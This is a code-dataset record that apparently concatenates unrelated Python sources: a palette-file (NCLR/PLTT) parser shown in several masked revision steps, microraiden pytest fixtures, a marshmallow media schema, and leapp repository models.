{ "blob_id": "2fadc5c90d1bae14c57fc3bf02582e12aa8abdf6", "index": 790, "step-1": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n <mask token>\n <mask token>\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n <mask token>\n <mask token>\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-2": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n <mask token>\n <mask token>\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n <mask token>\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start + i] = r >> 3 | g >> 3 << 5 | b >> 3 << 10\n\n\nclass 
NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-3": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n <mask token>\n <mask token>\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n\n def get_palette(self, pal_id, transparent=True):\n palette = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i in range(num):\n if not num and transparent:\n palette.append(chr(0) * 4)\n continue\n val = self.data[start + i]\n palette.append(chr((val >> 0 & 31) << 3) + chr((val >> 5 & 31) <<\n 3) + chr((val >> 10 & 31) << 3) + chr(255))\n return palette\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start + i] = r >> 3 | g >> 3 << 5 | b >> 3 << 10\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def 
get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-4": "<mask token>\n\n\nclass PLTT(Editable):\n <mask token>\n FORMAT_16BIT = 3\n FORMAT_256BIT = 4\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT')\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs + self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data) / num):\n palette = []\n for i in range(num):\n val = self.data[start + i]\n palette.append(((val >> 0 & 31) << 3, (val >> 5 & 31) << 3,\n (val >> 10 & 31) << 3, 255))\n start += num\n palettes.append(palette)\n return palettes\n\n def get_palette(self, pal_id, transparent=True):\n palette = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i in range(num):\n if not num and transparent:\n palette.append(chr(0) * 4)\n continue\n val = self.data[start + i]\n palette.append(chr((val >> 0 & 31) << 3) + chr((val >> 5 & 31) <<\n 3) + chr((val >> 10 & 31) << 3) + chr(255))\n return palette\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id * num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start + i] = r >> 3 | g >> 3 << 5 | b >> 3 << 10\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=65534)\n self.uint16('version', default=257)\n self.uint32('size_')\n self.uint16('headersize', default=16)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-5": "\nimport array\n\nfrom PIL import Image\n\nfrom generic.editable import XEditable as Editable\n\n\nclass PLTT(Editable):\n \"\"\"Palette information\"\"\"\n FORMAT_16BIT = 3\n FORMAT_256BIT = 4\n\n def define(self, clr):\n self.clr = clr\n self.string('magic', length=4, default='PLTT') # not reversed\n self.uint32('size_')\n self.uint32('format')\n self.uint32('extended')\n self.uint32('datasize')\n self.uint32('offset')\n self.data = ''\n\n def load(self, reader):\n Editable.load(self, reader)\n self.data = array.array('H', reader.read(self.datasize))\n\n def 
save(self, writer):\n writer = Editable.save(self, writer)\n ofs = writer.tell()\n writer.write(self.data.tostring())\n writer.writePadding(ofs+self.datasize)\n return writer\n\n def get_palettes(self):\n palettes = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = 0\n for pal_id in range(len(self.data)/num):\n palette = []\n for i in range(num):\n val = self.data[start+i]\n palette.append((((val >> 0) & 0x1f) << 3,\n ((val >> 5) & 0x1f) << 3,\n ((val >> 10) & 0x1f) << 3,\n 255))\n start += num\n palettes.append(palette)\n return palettes\n\n def get_palette(self, pal_id, transparent=True):\n palette = []\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id*num\n for i in range(num):\n if not num and transparent:\n palette.append(chr(0)*4)\n continue\n val = self.data[start+i]\n palette.append(chr(((val >> 0) & 0x1f) << 3) +\n chr(((val >> 5) & 0x1f) << 3) +\n chr(((val >> 10) & 0x1f) << 3) +\n chr(255))\n return palette\n\n def set_palette(self, pal_id, palette):\n \"\"\"\n\n Parameters\n ----------\n pal_id : int\n palette : list of tuple\n List of 4-/3-int-tuple colors\n \"\"\"\n if self.format == self.FORMAT_16BIT:\n num = 16\n elif self.format == self.FORMAT_256BIT:\n num = 256\n start = pal_id*num\n for i, color in enumerate(palette):\n if i > num:\n break\n r, g, b = color[:3]\n self.data[start+i] = ((r >> 3) |\n (g >> 3 << 5) |\n (b >> 3 << 10))\n\n\nclass NCLR(Editable):\n \"\"\"2d color information\n \"\"\"\n def define(self):\n self.string('magic', length=4, default='RLCN')\n self.uint16('endian', default=0xFFFE)\n self.uint16('version', default=0x101)\n self.uint32('size_')\n self.uint16('headersize', default=0x10)\n self.uint16('numblocks', default=1)\n self.pltt = PLTT(self)\n\n def load(self, reader):\n Editable.load(self, reader)\n assert self.magic == 'RLCN', 'Expected RLCN got '.format(self.magic)\n self.pltt.load(reader)\n\n def save(self, writer=None):\n writer = Editable.save(self, writer)\n writer = self.pltt.save(writer)\n return writer\n\n def get_palette(self, pal_id=0, transparent=True):\n return self.pltt.get_palette(pal_id, transparent)\n\n def get_palettes(self):\n return self.pltt.get_palettes()\n\n def set_palette(self, pal_id, palette):\n return self.pltt.set_palette(pal_id, palette)\n", "step-ids": [ 13, 14, 15, 16, 19 ] }
[ 13, 14, 15, 16, 19 ]
import pytest from eth_utils import encode_hex, remove_0x_prefix from ethereum.tester import keys import os import json from microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME from microraiden.crypto import privkey_to_addr @pytest.fixture def contracts_relative_path(): return 'data/contracts.json' @pytest.fixture def compiled_contracts_path(test_dir, contracts_relative_path): return os.path.join(test_dir, contracts_relative_path) @pytest.fixture def compiled_contracts(compiled_contracts_path): return json.load(open(compiled_contracts_path)) @pytest.fixture def test_dir(): return os.path.dirname(os.path.dirname(__file__)) + "/../" @pytest.fixture(scope='session') def use_tester(request): return request.config.getoption('use_tester') @pytest.fixture def api_endpoint(): """address of a paywall proxy""" return 'localhost' @pytest.fixture def api_endpoint_port(): """port the paywall proxy listens on""" return 5000 @pytest.fixture def api_endpoint_address(api_endpoint, api_endpoint_port): return api_endpoint + ":" + str(api_endpoint_port) @pytest.fixture def init_contract_address(): return "0x" + "a" * 40 @pytest.fixture def manager_state_path(): return '/tmp/rmp-state.pkl' @pytest.fixture(scope='session') def deployer_privkey(): return remove_0x_prefix(encode_hex(keys[3])) @pytest.fixture(scope='session') def deployer_address(deployer_privkey): return privkey_to_addr(deployer_privkey) @pytest.fixture(scope='session') def contract_abi_path(): return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json') @pytest.fixture(scope='session') def contract_abis(contract_abi_path): abi_file = open(contract_abi_path, 'r') return json.load(abi_file) @pytest.fixture(scope='session') def channel_manager_abi(contract_abis): return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi'] @pytest.fixture(scope='session') def channel_manager_bytecode(contract_abis): return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode'] @pytest.fixture(scope='session') def token_abi(contract_abis): return contract_abis[TOKEN_ABI_NAME]['abi'] @pytest.fixture(scope='session') def token_bytecode(contract_abis): return contract_abis[TOKEN_ABI_NAME]['bytecode'] @pytest.fixture(scope='session') def kovan_block_time(): return 4
normal
{ "blob_id": "438fe1ccf265706e202d7cc6044e57590f29801f", "index": 9375, "step-1": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\[email protected]\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email 
protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\[email protected](scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef kovan_block_time():\n return 4\n", "step-4": "<mask token>\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\[email protected]\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + '/../'\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + ':' + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return '0x' + 'a' * 40\n\n\[email protected]\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\[email protected](scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\n<mask token>\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\[email protected](scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef kovan_block_time():\n return 4\n", "step-5": "import pytest\nfrom eth_utils import encode_hex, remove_0x_prefix\nfrom ethereum.tester import keys\n\nimport os\nimport json\nfrom microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME\nfrom 
microraiden.crypto import privkey_to_addr\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\[email protected]\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + \"/../\"\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + \":\" + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return \"0x\" + \"a\" * 40\n\n\[email protected]\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\[email protected](scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\[email protected](scope='session')\ndef contract_abi_path():\n return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json')\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\[email protected](scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef kovan_block_time():\n return 4\n", "step-ids": [ 10, 11, 17, 18, 21 ] }
[ 10, 11, 17, 18, 21 ]
from marshmallow import fields from server.common.database import Media from server.common.schema.ref import ma class MediaSchema(ma.SQLAlchemyAutoSchema): class Meta: model = Media fields = ('id', 'name', 'mimetype', 'extension', 'owner', '_links') dump_only = ('id', 'owner', '_links') include_fk = True id = fields.UUID() owner = ma.auto_field('owner_id') _links = ma.Hyperlinks({ 'self': ma.URLFor('media', values={'media_id': '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor('media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor('media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner': ma.URLFor('user', values={'user_id': '<owner>'}) }) Media.__marshmallow__ = MediaSchema
normal
{ "blob_id": "1810fee40ff8a99871ecc1d024f6794a68ee54e8", "index": 3543, "step-1": "<mask token>\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({'self': ma.URLFor('media', values={'media_id':\n '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor(\n 'media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor(\n 'media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner':\n ma.URLFor('user', values={'user_id': '<owner>'})})\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({'self': ma.URLFor('media', values={'media_id':\n '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor(\n 'media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor(\n 'media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner':\n ma.URLFor('user', values={'user_id': '<owner>'})})\n\n\nMedia.__marshmallow__ = MediaSchema\n", "step-4": "from marshmallow import fields\nfrom server.common.database import Media\nfrom server.common.schema.ref import ma\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({'self': ma.URLFor('media', values={'media_id':\n '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor(\n 'media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor(\n 'media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner':\n ma.URLFor('user', values={'user_id': '<owner>'})})\n\n\nMedia.__marshmallow__ = MediaSchema\n", "step-5": "from marshmallow import fields\n\nfrom server.common.database import Media\nfrom server.common.schema.ref import ma\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Media\n fields = ('id', 'name', 'mimetype', 'extension', 'owner', '_links')\n dump_only = ('id', 'owner', '_links')\n include_fk = True\n\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({\n 'self': ma.URLFor('media', values={'media_id': '<id>'}),\n 'collection': ma.URLFor('medias'),\n 'image': ma.URLFor('media_file', values={'media_id': '<id>'}),\n 'thumbnail': ma.URLFor('media_file', values={'media_id': '<id>', 'thumb': ''}),\n 'owner': ma.URLFor('user', values={'user_id': '<owner>'})\n })\n\n\nMedia.__marshmallow__ = MediaSchema\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from leapp.models import Model, fields from leapp.topics import TransactionTopic class TargetRepositoryBase(Model): topic = TransactionTopic repoid = fields.String() class UsedTargetRepository(TargetRepositoryBase): pass class RHELTargetRepository(TargetRepositoryBase): pass class CustomTargetRepository(TargetRepositoryBase): name = fields.Nullable(fields.String()) baseurl = fields.Nullable(fields.String()) enabled = fields.Boolean(default=True) class TargetRepositories(Model): topic = TransactionTopic rhel_repos = fields.List(fields.Model(RHELTargetRepository)) custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]) class UsedTargetRepositories(Model): topic = TransactionTopic repos = fields.List(fields.Model(UsedTargetRepository)) class CustomTargetRepositoryFile(Model): topic = TransactionTopic file = fields.String()
normal
{ "blob_id": "47dc9212a1059cbca8ec6732deaa835fa9967fd8", "index": 2990, "step-1": "<mask token>\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-2": "<mask token>\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-3": "<mask token>\n\n\nclass TargetRepositoryBase(Model):\n <mask token>\n <mask token>\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = 